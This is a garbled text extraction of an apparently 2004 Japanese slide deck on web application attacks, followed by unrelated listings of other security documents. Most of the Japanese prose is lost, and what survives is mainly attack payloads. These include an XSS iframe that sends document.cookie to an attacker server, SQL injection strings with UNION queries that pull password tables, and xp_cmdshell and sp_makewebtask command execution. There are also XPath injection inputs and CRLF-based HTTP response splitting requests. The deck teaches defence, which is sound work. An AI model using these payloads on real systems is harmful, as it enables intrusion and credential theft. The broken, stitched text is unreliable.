shio_ r2.ppt[読み取り専用]

Size: px
Start display at page:

Download "shio_20041207r2.ppt[読み取り専用]"

Transcription

1 Web <shio@st.rim.or.jp>

2 Web SQL XPath HTTP 5 URL 2

3 SQL XPath HTTP 3

4 Cross-Site Scripting : XSS Web Web CGI Web IIS Apache JavaScript/VBscript Web Web IE Web Cookie ID Web Cookie 4

5 5

6 <h1>aaa</h1>... <h1>...</h1> heading h1 aaa 6

7 <script>alert("aaa")</script>... <script>...</script> JavaScript alert(...) script aaa 7

8 <script>alert(document.cookie)</script>... document.cookie Cookie script Cookie 8

9 XSS Cookie IE Cookie Attacker Server Cookie xssgetcookie.pl xss-reply.pl <iframe src=" /greeting.asp?name= <script>location.hr ef=' 81/'+document.coo kie</script>"></ifra me> Cookie Attacker Attacker Server Cookie Cookie Server 9

10 HTML HTML < > & " ' < > & " &#39; (); UTF-7 XSS 10

11 Web Web Web ID ID Web ID XSS Cookie URL ID ID 11

12 Web HTTP TCP ID ID ID ID 12

13 ID SID:1234 SID:1235 ID SID:1235 SID:1234 SID:1234 SID:1235 SID:1235 SID:

14 IIS ASP ID Cookie ASPSESSIONIDCAQRDBCS=IPHPPHBCNCNACKEPJAIBJJDI path / secure Cookie Non-Persistent IIS ID Session("auth") = true Session.Abandon 20 Session.Timeout ID ID??? 14

15 XSS Cookie ID Web login.asp menu.asp Anne Janet ID Steven hehehe hahaha hohoho process1.asp process2.asp logout.asp 15

16 Attacker ID xss-reply2.pl xssgetcookie.pl ID menu.asp Server Server Web ID XSS Cookie ID Attacker ID 16

17 Session Fixation ID fix Web ID ID ID URL XSS Cookie Web ID ID Web 17

18 SID:1234 ID SID:1234 SID 1234 SID:1234 SID:1234 SID:1234 ID 1234 SID 1234 HTML ID SID:1234 SID

19 XSS Cookie ID Attacker ID xss-setcookie.pl ID menu.asp Server Server... ID Server Web ID XSS /Server Cookie ID ID 19

20 ID ID IIS ID Web ID Cookie Hidden? XSS Web IIS 20

21 SQL Web SQL Web SQL Structured Query Language... DB SELECT Username FROM Users WHERE Username = 'X' AND Password = 'Y'... Users Username X Password Y Username SQL X Y SQL SQL

22 SQL login.asp SELECT * FROM Passwords WHERE Name = '" & Request.Form("uid") & "' AND Password = '" & Request.Form("pass") & "' menu.asp process1.asp process2.asp logout.asp Passwords Name Password Steven hehehe Anne hahaha Janet hohoho 22

23 SQL SQL ' or 'a'='a? ID aaa ' or 'a'='a SELECT * FROM Passwords WHERE Name = '" & Request.Form("uid") & "' AND Password = '" & Request.Form("pass") & "' SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = '' or 'a'='a' SELECT... 23

24 SQL ID aaa ' or 'a'='a... 24

25 SQL UNION UNION... SQL A B SELECT, FROM A UNION SELECT, FROM B

26 SQL UNION login.asp menu.asp process1.asp process2.asp logout.asp SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '% " & Request.Form("search") & "%' Employees LastName FirstName Title Address Buchanan Steven Dodsworth Anne Leverling Janet

27 SQL UNION SQL xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '? SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '%" & Request.Form("search") & "%' SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '%xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '%' Employees sysobjects... sysobjects DB 27

28 SQL ID Steven / hehehe xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '... 28

29 SQL sysobjects DB xtype... U: S: V:... Passwords ID xxxx' union select name, id, 'a', 'a' from syscolumns where id = Passwords ID and name like ' 29

30 SQL Passwords Name Password Passwords ID xxxx' union select name, password, 'a', 'a' from passwords where name like ' 30

31 SQL Stored procedure... MS SQL Server SQL Web MS SQL Server xp_cmdshell... OS sp_makewebtask... HTML 31

32 SQL xp_cmdshell sp_makewebtask xp_cmdshell OS xp_cmdshell {'command_string'} [, no_output] exec master..xp_cmdshell 'dir *.exe' sp_makewebtask HTML sp_makewebtask =] 'outputfile', =] 'query' [,...] exec sp_makewebtask 'c: inetpub wwwroot out.html', 'select * from passwords' exec sp_makewebtask 'c: inetpub wwwroot out.html', "exec master..xp_cmdshell 'dir *.exe'" 32

33 SQL SQL xp_cmdshell server ping IP PC windump/tcpdump windump -n host IP and icmp windump icmpsniff IP IP ID aaa xxx'; exec master..xp_cmdshell 'ping IP SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = 'xxx' ; exec master..xp_cmdshell 'ping IP ' SQL 33

34 SQL ID SQL... ID xxx'; exec master..xp_cmdshell 'ping IP ';-- xxx SELECT * FROM Passwords WHERE Name = 'xxx' ; exec master..xp_cmdshell 'ping IP '; -- ' AND Password = 'xxx' SQL SQL 34

35 SQL SQL sp_makewebtask server HTML ID aaa xxx'; exec sp_makewebtask 'c: inetpub wwwroot.html', "exec master..xp_cmdshell 'dir *.exe'" ; -- SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = 'xxx'; exec sp_makewebtask 'c: inetpub wwwroot.html', "exec master..xp_cmdshell 'dir *.exe'" ; --' 35

36 SQL SQL SQL ' '' SQL DBMS DBMS SQL SQL prepared statements DBMS SQL 36

37 XPath Web XPath XML XPath Web XPath XML Path Language... XML /UserList/User[Name='X' and Password='Y']... /UserList/User Name X Password Y XPath X Y XPath... XML 37

38 XPath auth.asp XML /UserList/User[Name='" & Request.Querystring("uid") & "' and Password='" & Request.Querystring("pass") & "'] userlist.xml <?xml version="1.0" encoding="iso "?> <UserList> <User> <Name>Steven</Name> <Password>hehehe</Password> <Title>Sales Manager</Title> <Address>14 Garrett Hill</Address> </User> <User> <Name>Anne</Name> <Password>hahaha</Password> <Title>Sales Representative</Title> <Address>7 Houndstooth Rd.</Address> </User> <User> <Name>Janet</Name> <Password>hohoho</Password> <Title>Sales Representative</Title> <Address>722 Moss Bay Blvd.</Address> </User> </UserList> 38

39 XPath XPath ' or 'a'='a? ID aaa ' or 'a'='a /UserList/User[Name='" & Request.Querystring("uid") & "' and Password='" & Request.Querystring("pass") & "'] /UserList/User[Name='aaa' and Password='' or 'a'='a'] User... 39

40 XPath ID aaa ' or 'a'='a... 40

41 XPath XPath XPath ' ' XPath "? XPath 41

42 HTTP HTTP Response Splitting HTTP Location Web Cookie 42

43 HTTP GET /redir_lang.asp?lang=english Server HTTP/ Object moved Location: english.html GET /english.html GET /redir_lang.asp?lang=%0d%0a %0d%0aHTTP/1.1%20200%20ok %0d%0a<html>poisoned</html> Server HTTP/ Object moved Location: = HTTP/ ok <html>poisoned</html>.html 43

44 HTTP GET /redir_lang.asp?lang=%0d%0a %0d%0aHTTP/1.1%20200%20ok %0d%0a<html>poisoned</html> GET /index.html Server HTTP/ Object moved Location: = HTTP/ ok <html>poisoned</html>.html TCP!! index.html <html>poisoned</html> 44

45 HTTP Web Attacker GET /redir_lang.asp? lang=%0d%0a%0d %0aHTTP/ GET /index.html Proxy GET /redir_lang.asp? lang=%0d%0a%0d %0aHTTP/ Server GET /index.html HTTP/ Location: = GET /index.html HTTP/ ok <html>poisoned... index.html <html>poisoned... HTTP/ ok <html>poisoned... Proxy 45

46 HTTP Web Apache rs-apache.pl 46

47 HTTP IE Attacker Server <frame src=" GET /redir_lang.asp? lang=%0d%0a%0d %0aHTTP/1.1...> <frame src=" GET /index.html> rs-iepoison.pl Attacker Server index.html <html>poisoned... Server 47

48 HTTP XSS GET /redir_lang.asp?lang=%0d%0a %0d%0aHTTP/1.1%20200%20ok %0d%0a<html><script>alert(doc ument.cookie)</script></html> Server HTTP/ Object moved Location: = HTTP/ ok <html><script>alert(document.coo kie)</script></html>.html IE Cookie rs-iexss.pl, xss-getcookie.pl 48

49 HTTP HTTP HTTP %0d%0a CR/LF HTTP Location Set-Cookie %0d%0a CR/LF... HTTP 49

50 hidden Cookie HTTP... HTML SQL XPath LDAP HTTP system open... DB... Web DBMS SQL XPath HTML HTTP... 50

51 WASC Web Security Threat Classification OWASP Guide to Building Secure Web Applications OWASP Top Ten Most Critical Web Application Vulnerabilities Cross-site Scripting Overview Web Application Security Web ASP Part

52 Web ASP Part 2 IPA ISEC Web 31 Understanding Malicious Content Mitigation for Web Developers Microsoft Windows 2000 Server : tm IIS Cookie SSL-Secure 52

53 @IT: Web SQL Injection - Are Your Web Applications Vulnerable? xp_cmdshell sp_makewebtask Blind XPath Injection pdf "Divide and Conquer" - HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics 53

shio_20041004.PDF

shio_20041004.PDF JPNIC JPCERT/CC 2004 Web 2004 10 4 Web Web Web WASC Web Application Security Consortium 7 Web Security Threat Classification Web URL 2 ...?? It depends!? It depends!??? 3 ? It depends!...

More information

第2回_416.ppt

第2回_416.ppt 3 2 2010 4 IPA Web http://www.ipa.go.jp/security/awareness/vendor/programming Copyright 2010 IPA 1 2-1 2-1-1 (CSRF) 2-1-2 ID 2-1-3 ID 2-1-4 https: 2-1-5 ID 2-1-6 2-1-7 2-2 2-2-1 2-2-2 2-3 2 2-3-1 Web Copyright

More information

第3回_416.ppt

第3回_416.ppt 3 3 2010 4 IPA Web http://www.ipa.go.jp/security/awareness/vendor/programming Copyright 2010 IPA 1 3-1 3-1-1 SQL #1 3-1-2 SQL #2 3-1-3 3-1-4 3-2 3-2-1 #2 3-2-2 #1 3-2-3 HTTP 3-3 3-3-1 3-3-2 Copyright 2010

More information

untitled

untitled Windows Internet Information Server SQL Server 2 Explorer 3 MMC MMC mmc /a SQL Enterprise Manager IIS 4 MMC 5 MMC 6 Internet Information Server IIS %SystemRoot% system32 Logfiles IIS Web 8 IIS 9 ODBC Windows

More information

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF XSS + CSRF JPNIC JPCERT/CC 2005 Web 2005 10 6 IS Copyright 2005 SECOM Co., Ltd. All rights reserved. 1 XSS + CSRF Web Web Web (Web, DB, ) Copyright 2005 SECOM Co., Ltd. All rights reserved. 2 SQL XSS Copyright

More information

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 2006 12 14 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 2 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions,

More information

1 2 1.1................................ 2 1.2................................. 2 1.2.1............................... 3 1.2.2.........................

1 2 1.1................................ 2 1.2................................. 2 1.2.1............................... 3 1.2.2......................... 18 PHP Ajax 1 2 1.1................................ 2 1.2................................. 2 1.2.1............................... 3 1.2.2................................... 3 2 7 2.1.......................

More information

n-miwa@lac.co.jp (JSOC) OS Web (JSOC) (JSOC) SQL SQL Event Name Source IP Correlated Horizontal Scan Detected Microsoft ASN.1 Library Buffer Overflow Detected Vertical Scan Detected Internet Explorer

More information

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ 2 : TCP/IP : HTTP HTTP/2 1 / 22 httpget.txt: http.rb: ruby http get Java http ( ) HttpURLConnection 2 / 22 wireshark httpget.txt httpget cookie.txt ( ) telnet telnet localhost 80 GET /index.html HTTP/1.1

More information

●70974_100_AC009160_KAPヘ<3099>ーシス自動車約款(11.10).indb

●70974_100_AC009160_KAPヘ<3099>ーシス自動車約款(11.10).indb " # $ % & ' ( ) * +, -. / 0 1 2 3 4 5 6 7 8 9 : ; < = >? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y " # $ % & ' ( ) * + , -. / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B

More information

SQL Web Web SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL i

SQL Web Web SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL i 28 SQL Proposal of attack detection method based on appearance frequency of symbols included in SQL injection attack and its relevance 1170311 2017 2 28 SQL Web Web SQL SQL SQL SQL SQL SQL SQL SQL SQL

More information

25 About what prevent spoofing of misusing a session information

25 About what prevent spoofing of misusing a session information 25 About what prevent spoofing of misusing a session information 1140349 2014 2 28 Web Web [1]. [2] SAS-2(Simple And Secure password authentication protocol, ver.2)[3] SAS-2 i Abstract About what prevent

More information

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ 6 : JavaScript 2 : Web Web HTTPS : Web : Web, Internet Week 1 / 23 2 / 23 Web Web : HTTP: ( ) TCP: IP: ( ) Web 3 / 23 Basic (base64 ) ( ) Digest md5 Basic (nonce) hidden

More information

WebOS aplat WebOS WebOS 3 XML Yahoo!Pipes Popfry UNIX grep awk XML GUI WebOS GUI GUI 4 CUI

WebOS aplat WebOS WebOS 3 XML Yahoo!Pipes Popfry UNIX grep awk XML GUI WebOS GUI GUI 4 CUI 7 XML Week Web WebOS WebShell WebOS WebOS GUI WebOS WebOS 2 WebOS aplat WebOS WebOS 3 XML Yahoo!Pipes Popfry UNIX grep awk XML GUI WebOS GUI GUI 4 CUI CUI JavaScript I/O CommandClass WebShell webshell

More information

HTTP Web Web RFC2616 HTTP/1.1 Web Apache Tomcat (Servlet ) XML Xindice Tomcat 6-2

HTTP Web Web RFC2616 HTTP/1.1 Web Apache Tomcat (Servlet ) XML Xindice Tomcat 6-2 HTTP 6-1 HTTP Web Web RFC2616 HTTP/1.1 Web Apache Tomcat (Servlet ) XML Xindice Tomcat 6-2 HTTP ( ) ( ) (GET, POST ) (Host ) Tomcat Servlet Examples / Request Headers ( ) (200, 404 ) (Content-Type ) 6-3

More information

FileMaker Instant Web Publishing Guide

FileMaker Instant Web Publishing Guide FileMaker 8.5 Web 2004-2006 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker, Inc. ScriptMaker FileMaker, Inc. FileMaker FileMaker,

More information

FileMaker Instant Web Publishing Guide

FileMaker Instant Web Publishing Guide FileMaker 9 Web 2004-2007 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMakerFileMaker, Inc. ScriptMaker FileMaker, Inc. FileMaker FileMaker,

More information

GPS携帯端末を用いた近隣バス停位置と

GPS携帯端末を用いた近隣バス停位置と GPS S003036 2004 2 13 ... 3... 4 2.1...4 2.2...5 2.3...6... 8 3.1 DBMS...8 3.1.1 DBMS...8 3.1.2...9 3.1.3...10 3.2 Web...10 3.2.1 Web...10 3.2.2 JDBC... 11 3.3...11 3.3.1 SQL... 11 3.3.2 Java...12 3.4...12

More information

Web Web Web Web i

Web Web Web Web i 28 Research of password manager using pattern lock and user certificate 1170369 2017 2 28 Web Web Web Web i Abstract Research of password manager using pattern lock and user certificate Takuya Mimoto In

More information

2

2 0. 92a --------------------------------------------------------- ---------------------------------------------------- 1. 1-1. 1-2. 1-3. 2. 2-5. 1 2 a ---------------------------------------------------------

More information

untitled

untitled IT IT IT IT 1 IT 2 Software as a Service (SaaS 3 ) IT SaaS 4 SaaS SaaS PC SaaS SaaS Web SaaS ID IT SaaS IT 1 2 3 Software as a Service ASP(Application Service Provider) SaaS 4 ASPIC SaaS SaaS SaaS SaaS

More information

ohp.mgp

ohp.mgp 2019/06/11 A/B -- HTML/WWW(World Wide Web -- (TA:, [ 1 ] !!? Web Page http://edu-gw2.math.cst.nihon-u.ac.jp/~kurino VNC Server Address : 10.9.209.159 Password : vnc-2019 (2019/06/04 : : * * / / : (cf.

More information

Web Web ( (SOAP (SOAP/http (WSDL UDDI 1. 2.XML 3. (XDoS http, https SOAP XML Web/App ( App

Web Web ( (SOAP (SOAP/http (WSDL UDDI 1. 2.XML 3. (XDoS http, https SOAP XML Web/App ( App Web 2005 12 15 XML Day XML matsu@kabuki.tel.co.jp 2005 1 1 Web Web Web 2005 2 2 Web 2005 3 3 Web ( (SOAP (SOAP/http (WSDL UDDI 1. 2.XML 3. (XDoS http, https SOAP XML Web/App ( App 2005 4 4 SOAP Crypto-Gram

More information

CAS Yale Open Source software Authentication Authorization (nu-cas) Backend Database Authentication Authorization to@math.nagoya-u.ac.jp, Powered by A

CAS Yale Open Source software Authentication Authorization (nu-cas) Backend Database Authentication Authorization to@math.nagoya-u.ac.jp, Powered by A Central Authentication System naito@math.nagoya-u.ac.jp to@math.nagoya-u.ac.jp, Powered by Adobe Reader & ipod Photo March 10, 2005 RIMS p. 1/55 CAS Yale Open Source software Authentication Authorization

More information

FileMaker Server Getting Started Guide

FileMaker Server Getting Started Guide FileMaker Server 13 2007-2013 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento FileMaker, Inc. FileMaker WebDirect Bento FileMaker,

More information

FileMaker Instant Web Publishing Guide

FileMaker Instant Web Publishing Guide FileMaker 8 Web 2004-2005 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker, Inc. ScriptMaker FileMaker, Inc. FileMaker FileMaker,

More information

[ ] ( IPA ) IPA Warning! ( ) (1) IPA ( ) IPA 1-1 IPA ( 1-2 ) IPA - 1 -

[ ] ( IPA ) IPA Warning! ( ) (1) IPA ( ) IPA 1-1 IPA ( 1-2 ) IPA - 1 - 08-25-135 2008 11 5 [2008 10 ] (IPA )2008 10 1 IPA 9 50 10 31 Warning! () (1) IPA () IPA 1-1 IPA ( 1-2 ) 1-1 1-2IPA - 1 - (2) (a) (i) (ii) http://www.ipa.go.jp/security/txt/2008/documents/infection_images.html

More information

目次

目次 1... 2 2... 3 3... 4 4... 6 5... 7 6... 9 7... 10 8...11 9... 12 10... 13 11 VPN... 16 12LAN PC / /... 19 13... 22 14PC... 23 15... 24 16... 26 17Web... 27 18... 29 19... 30 20... 32 21... 34 22... 36

More information

untitled

untitled 2 1 Web 3 4 2 5 6 3 7 Internet = Inter Network 8 4 B B A B C A B C D D 9 A G D G F A B C D F D C D E F E F G H 10 5 11 Internet = Inter Network PC 12 6 1986 NSFNET 1995 1991 World Wide Web 1995 Windows95

More information

付加情報をもったファイル共有システム

付加情報をもったファイル共有システム 1 2 1 6 1.1....................................... 6 1.2...................................... 6 1.3..................................... 6 1.4................................... 7 2 8 2.1 Annphony....................................

More information

Copyright

Copyright 2008 pdf Copyright 2008 2008 Copyright 2008 2008 2 SQL DNS Copyright 2008 2008 3 SQL Copyright 2008 2008 1 SQL 1.1 SQL 1.2 : 1.3 SQL 1.4 SQL Copyright 2008 2008 5 1.1 SQL Copyright 2008 2008 6 1.1 SQL

More information

untitled

untitled 200 7 19 JPCERT [2007 2 4 6 ] IPA JPCERT JPCERT/CC 2007 2 4 6 1 2 1. 2007 2 1 2007 4 1 6 30 IPA 46 95 141 2004 7 8 501 940 1,441 3 2 (1) 3 2004 7 8 1 2007 2 1.98 1 2005/1Q 2005/2Q 2005/3Q 2005/4Q 2006/1Q

More information

Web...1 1....2 1.1....2 1.2....3 1.3. STEPS...4 2. Web...5 2.1. Web...5 2.2....5 2.3. Form Cookie...6 2.4....7 2.5. HTTP...7 3. STEPS Web...8 3.1....8

Web...1 1....2 1.1....2 1.2....3 1.3. STEPS...4 2. Web...5 2.1. Web...5 2.2....5 2.3. Form Cookie...6 2.4....7 2.5. HTTP...7 3. STEPS Web...8 3.1....8 2001/1/11 Web Simplified Techniques for Econometric Plannings & Simulations for WWW Fujiwara Takamichi 97-5075 N-23 Web...1 1....2 1.1....2 1.2....3 1.3. STEPS...4 2. Web...5 2.1. Web...5 2.2....5 2.3.

More information

CONTENTS 1 2 2 5 3 8 4 9 5 18 6 20 7 27 8 31 9 Web 33 10 36 11 37 12 39 2

CONTENTS 1 2 2 5 3 8 4 9 5 18 6 20 7 27 8 31 9 Web 33 10 36 11 37 12 39 2 USER'S MANUAL CONTENTS 1 2 2 5 3 8 4 9 5 18 6 20 7 27 8 31 9 Web 33 10 36 11 37 12 39 2 1 Internet Explorer 6.0 DHTML Flash Flash 2 Web Web FTP Web Windows Windows Windows Windows 100 OS CPU HDD DOS/V

More information

Web SOAP Internet Web REST SOAP REST 3 REST SOAP 4

Web SOAP Internet Web REST SOAP REST 3 REST SOAP 4 XML Day Web2.0 REST SOAP SOAP REST WADL, WSDL2.0 REST SOAP " " 2006 12 11 XML Web2.0 SOAP REST 2 Web SOAP Internet Web REST SOAP REST 3 REST SOAP 4 REST Representational State Transfer REST Web URL XML

More information

XISによる効率良いシステム開発のポイント

XISによる効率良いシステム開発のポイント XML excelon XIS excelon XIS XML April 17, 2002 excelon Extensible Information Server Page 2 Overview XML DOM (XML ) ( ) excelon XIS (DOM ) CRUD ( XML ) amazon.com 2,000 / 100 / GUI / ( 10 ) Windows (NT/2000/XP),

More information

スライド 1

スライド 1 IBM Global Technology Services PCI DSS ITS IAS. IAS. 2I/T 1PCIDSS 2 2 PCI DSS QSA PCIDSS Fi Gap IBM PCIDSS IBM PCIDSS QSA QSA PCIDSS ROC* 1/ * ROC: Report on Compliance 3 PCI DSS 4 PCIDSS PCIDSS 1. PCIDSS

More information

FileMaker WebDirect Guide

FileMaker WebDirect Guide FileMaker 13 WebDirect 2014 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento FileMaker, Inc. FileMaker WebDirect Bento FileMaker,

More information

ウイルスバスター ビジネスセキュリティ インストールガイド

ウイルスバスター ビジネスセキュリティ インストールガイド TM 2 3 6 Biz 10 Biz 36 46 51 9.0 Windows /PC/Mac 1 readme CD-ROM.htm CD-ROM PDF PDF Web http://tmqa.jp/dl49 TRENDMICRO TREND MICRO Trend Micro Smart Protection Network Smart Protection Network SPN 2 Copyriht

More information

Microsoft Windows Hyper-VでのVNXeシステムの使用

Microsoft Windows Hyper-VでのVNXeシステムの使用 EMC VNXe Microsoft Windows Hyper-V VNXe VNXe Operating Environment 2.4 P/N 300-010-552 04 Copyright 2013 EMC Corporation. All rights reserved. 2013 5 EMC Corporation EMC Corporation EMC EMC 2 EMC EMC EMC

More information

Windows2000 Edge Components V Edge Components V Java Edge Components

Windows2000 Edge Components V Edge Components V Java Edge Components WebSphere Application Server V5.1 Edge Components V5.1 / CBR Method Ver. 1.0 - Windows 2000 - 1.... 3 2. Windows2000 Edge Components V5.1... 4 2.1.... 4 2.2.... 4 3. Edge Components V5.1... 5 3.1.... 5

More information

untitled

untitled 2 1 2 3 4 6 7 7 7 8 9 9 10 10 10 12 12 13 14 17 19 20 21 22 22 24 24 26 26 26 27 29 29 29 30 32 32 33 34 35 35 36 37 38 39 39 40 41 41 41 1960 (DataBase Management System) 1970 1987 SQL Structured Query

More information

Session Fixation ID ID ID ID WhiteHat Security 1) 12% Session Fixation MBSD 2) Session Fixation Session Fixation ID ID ID ID ID Session Fixation ID ID

Session Fixation ID ID ID ID WhiteHat Security 1) 12% Session Fixation MBSD 2) Session Fixation Session Fixation ID ID ID ID ID Session Fixation ID ID Session ID Session Fixation 1 1 1, 2 Session Fixation Session Fixation ID Session Fixation ID ID ID ID Session Fixation Session Fixation Detection of Session Fixation Vulnerabilities with Session ID Monitoring

More information

FUJITSU Network Si-R Si-R Gシリーズ Webユーザーズガイド

FUJITSU Network Si-R Si-R Gシリーズ Webユーザーズガイド P3NK-4582-03Z0 Si-R G Web Web FUJITSU Network Si-R FUJITSU Network Si-R Si-R G Si-R brin Web V2 LAN 2012 3 2013 3 2 2014 11 3 Microsoft Corporation Copyright FUJITSU LIMITED 2012-2014 2 ... 2...5...5...5...6...7

More information

NEEDS Yahoo! Finance Yahoo! NEEDS MT EDINET XBRL Magnetic Tape NEEDS MT Mac OS X Server, Linux, Windows Operating System: OS MySQL Web Apache MySQL PHP Web ODBC MT Web ODBC LAMP ODBC NEEDS MT PHP: Hypertext

More information

Microsoft PowerPoint - 情報システム20131127.pptx

Microsoft PowerPoint - 情報システム20131127.pptx 2013 11 27 NTT ISP IP 32 8. FTTH OLT ONU( ) ADSL DSLAM ADSL (ISDN) WiMAX ISP i sp ISP LAN ISP IP PPPoE FTTH ADSL BAS ID IP PPP RAS ID IP DHCP DHCP IP PPPoE ID ID ISP @ IP IPCP ID PC PC WAN LAN PC PPPoE

More information

Epson Print Admin

Epson Print Admin Epson Print Admin NPD5369-02 JA Epson Print Admin Epson Print Admin Epson Print Admin Epson Open Platform Epson Open Platform Epson Print Admin Epson Print Admin 2 B K L U OS Windows OSWindows 10Windows

More information

0序文‐1章.indd

0序文‐1章.indd 本 書 に 記 載 されたURL 等 は 執 筆 時 点 でのものであり 予 告 なく 変 更 される 場 合 があります 本 書 の 使 用 ( 本 書 のとおりに 操 作 を 行 う 場 合 を 含 む)により 万 一 直 接 的 間 接 的 に 損 害 が 発 生 し ても 出 版 社 および 著 者 は 一 切 の 責 任 を 負 いかねますので あらかじめご 了 承 下 さい Microsoft

More information

FileMaker WebDirect Guide

FileMaker WebDirect Guide FileMaker 14 WebDirect 2015 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc. FileMaker WebDirect FileMaker,

More information

Oracle Application Server 10g Release 3(10.1.3)Oracle HTTP Serverの概要

Oracle Application Server 10g Release 3(10.1.3)Oracle HTTP Serverの概要 Oracle Application Server 10g Release 3 10.1.3 Oracle HTTP Server Oracle 2005 12 Oracle Application Server 10g Oracle HTTP Server... 3 OHS:... 3 Oracle HTTP Server... 4 Apache : HTTP v1.1... 4 Apache 2.0...

More information

1 Linux UNIX-PC LAN. UNIX. LAN. UNIX. 1.1 UNIX LAN. 1.2 Linux PC Linux. 1.3 studenta odd kumabari studentb even kumabari studentc odd kumabari student

1 Linux UNIX-PC LAN. UNIX. LAN. UNIX. 1.1 UNIX LAN. 1.2 Linux PC Linux. 1.3 studenta odd kumabari studentb even kumabari studentc odd kumabari student LAN 0000000000 6/6, 6/13, 6/20 1 Linux UNIX-PC LAN. UNIX. LAN. UNIX. 1.1 UNIX LAN. 1.2 Linux PC Linux. 1.3 studenta odd kumabari studentb even kumabari studentc odd kumabari studentd even kumabari 1: LAN

More information

"CAS を利用した Single Sign On 環境の構築"

CAS を利用した Single Sign On 環境の構築 CAS 2 Single Sign On 1,3, 2,3, 2, 2,3 1 2 3 May 31, 2007 ITRC p. 1/29 Plan of Talk Brief survey of Single Sign On using CAS Brief survey of Authorization Environment using CAS 2 Summary May 31, 2007 ITRC

More information

FileMaker Server 9 Getting Started Guide

FileMaker Server 9 Getting Started Guide FileMaker Server 10 2007-2009 FileMaker, Inc. All rights reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento Bento FileMaker, Inc. Mac Mac Apple Inc. FileMaker

More information

橡t15-shibuya.kashiwa.ppt

橡t15-shibuya.kashiwa.ppt PHPLib PHPLib 1 Web Application PHPLib DB_S PostgreSQL, MySQL, Oracle, ODBC Session GET Auth Perm User 2 PHPLib local.inc Require($_PHPLIB[ libdir ]. db_mysql.inc ); db_pgsql.inc prepend.php3 Php3.ini

More information

intra-mart ver /10/31 1. / intra-mart 3.2 AND intra-mart (JavaMail ) ( )

intra-mart ver /10/31 1. / intra-mart 3.2 AND intra-mart (JavaMail ) ( ) intra-mart ver3.2 2002/10/31 1. / intra-mart 3.2 AND intra-mart (JavaMail ) (2002 3 ) 2. intra-mart ver3.2 intra-mart ver3.2 BMv3.2 intra-mart ver3.2 Java Sun JRE1.3.1(J2EE JDK1.3.1) Web Web intra-mart

More information

2 2 2 6 9 9 10 14 18 19 21 22 22 Java 23 24 25 25 26 30 31 32 39 46 53 55 58 2 2.0 2.0R Ver.2.0R Java Java 2.0 2.0R 2.0R 2.0 Ver2.0 2.0R Ver2.0R 19 Sun Sun Microsystems Java Java Sun Microsystems, Inc.

More information

OOW_I06

OOW_I06 G XDK XML Agenda XDK Overview XML Parser XML Schema Processor (XML SQL Utility XML Class Generator XML Transviewer Beans XSQL Servlet Oracle XML Developer s Kit Oracle XML Devleloper s Kit (XDK XML DB

More information

ict8.key

ict8.key Cookie Web HTTP HTTP stateless HTTP A A B, C B C cookie (RFC2965/6265) HTTP Javascript URL Web Web Cookie HTTP Cookie Cookie Cookie 1 Cookie Cookie Cookie Cookie Cookie Cookie Cookie Cookie 1) Web Cookie

More information

"CAS を利用した Single Sign On 環境の構築"

CAS を利用した Single Sign On 環境の構築 CAS 2 SSO Authorization 1,3, 2,3, 2, 2,3 1 2 3 Central Authentication and Authorization Service (CAS 2 ) Web Application Single Sign On Authorization CAS 2 SSO/AuthZ Jan. 30 2007, p. 1/40 Plan of Talk

More information

untitled

untitled Worldspan go! 4.x (UCI) Administrator Guide go! 4.x (UCI) Version 2.1.4 : 31 August 2007 1. WORLDSPAN GO! VERSION 4.X (UCI)... 3 2. WORLDSPAN GO! VERSION 4.X (UCI)... 4 3.... 6 4. WORLDSPAN GO! VERSION

More information

FileMaker Server Getting Started Guide

FileMaker Server Getting Started Guide FileMaker Server 12 2007 2012 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento FileMaker, Inc. Bento FileMaker, Inc. FileMaker

More information

Copyright

